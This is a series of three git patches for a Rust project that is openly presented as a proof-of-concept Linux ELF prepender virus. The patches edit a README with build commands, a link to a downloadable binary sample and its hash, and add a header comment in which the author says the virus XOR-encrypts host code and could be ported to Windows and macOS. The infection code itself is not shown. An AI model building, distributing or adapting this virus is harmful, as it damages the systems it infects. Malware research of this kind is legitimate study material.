From ff6a3d9bc946a73984d1a35d2fff278de74070bf Mon Sep 17 00:00:00 2001 From: Guilherme Thomazi Bonicontro Date: Fri, 6 Sep 2019 15:45:21 +0200 Subject: [PATCH 1/3] Update README.md --- README.md | 23 +++++++++++++++++++++-- 1 file changed, 21 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7c223f9..d0289b2 100644 --- a/README.md +++ b/README.md @@ -1,2 +1,21 @@ -# Fe2O3 -Simple prepender virus written in Rust +# Linux.Fe2O3 + +This is a POC ELF prepender written in Rust. I like writting prependers on languages that I'm learning and find interesting. + +# Build +```$ cd src +$ rustc main.rs -o Linux.Fe2O3 +``` + +Note that the Rust version used is `rustc 1.37.0 (eae3437df 2019-08-13)`, the latest at this moment. + +# Binary Sample +A binary sample is also available at https://www.guitmz.com/Linux.Fe2O3 (SHA1: c185ab0fd9b1c8f3ddaed7079898383edbcbb7f7). + +``` +$ file Linux.Fe2O3 +Linux.Fe2O3: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, with debug_info, not stripped +``` + +# Demo +[![asciicast](https://asciinema.org/a/gMwAoQozAKpX851zXE8DncDSc.png)](https://asciinema.org/a/gMwAoQozAKpX851zXE8DncDSc) From 0d6778bc9c3242bbe8553fa508caeb1dda2da763 Mon Sep 17 00:00:00 2001 From: Guilherme Thomazi Bonicontro Date: Fri, 6 Sep 2019 15:52:14 +0200 Subject: [PATCH 2/3] Update main.rs --- src/main.rs | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) diff --git a/src/main.rs b/src/main.rs index 8e96f38..922eb64 100644 --- a/src/main.rs +++ b/src/main.rs @@ -1,3 +1,26 @@ +/* + This is a ELF prepender written in Rust by TMZ (2019). + I like writting prependers on languages that I'm learning and find interesting. + + Linux.Fe2O3 (September 2019) - Simple binary infector written in Rust. + This version encrypts the host code with a simple XOR and decrypts it at runtime. + It's almost a direct port from my Nim infector Linux.Cephei and Go infector Linux.Liora. + + Build with: rustc main.rs -o Linux.Fe2O3 + + Note that Rust version used was rustc 1.37.0 (eae3437df 2019-08-13). + It has no external dependencies so it should compile under most systems (tested under x86_64). + It's also possible to adapt it to be a PE/Mach infector and compile under Windows/macOS. + + Use at your own risk, I'm not responsible for any damages that this may cause. + A big shout for those who keeps the scene alive! + + Feel free to email me: thomazi@linux.com || guilherme@guitmz.com + You can also find me at Twitter @TMZvx || @guitmz + + https://www.guitmz.com +*/ + use std::ffi::{OsStr, OsString}; use std::fs::File; use std::io::prelude::*; From a734f02f40cddaab2fba0d93710f404b85dd33b4 Mon Sep 17 00:00:00 2001 From: Guilherme Thomazi Bonicontro Date: Fri, 6 Sep 2019 15:55:37 +0200 Subject: [PATCH 3/3] Update README.md --- README.md | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index d0289b2..8b72e54 100644 --- a/README.md +++ b/README.md @@ -10,11 +10,14 @@ $ rustc main.rs -o Linux.Fe2O3 Note that the Rust version used is `rustc 1.37.0 (eae3437df 2019-08-13)`, the latest at this moment. # Binary Sample -A binary sample is also available at https://www.guitmz.com/Linux.Fe2O3 (SHA1: c185ab0fd9b1c8f3ddaed7079898383edbcbb7f7). +A binary sample is also available at https://www.guitmz.com/Linux.Fe2O3 ``` $ file Linux.Fe2O3 Linux.Fe2O3: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, with debug_info, not stripped + +$ sha1sum Linux.Fe2O3 +c185ab0fd9b1c8f3ddaed7079898383edbcbb7f7 Linux.Fe2O3 ``` # Demo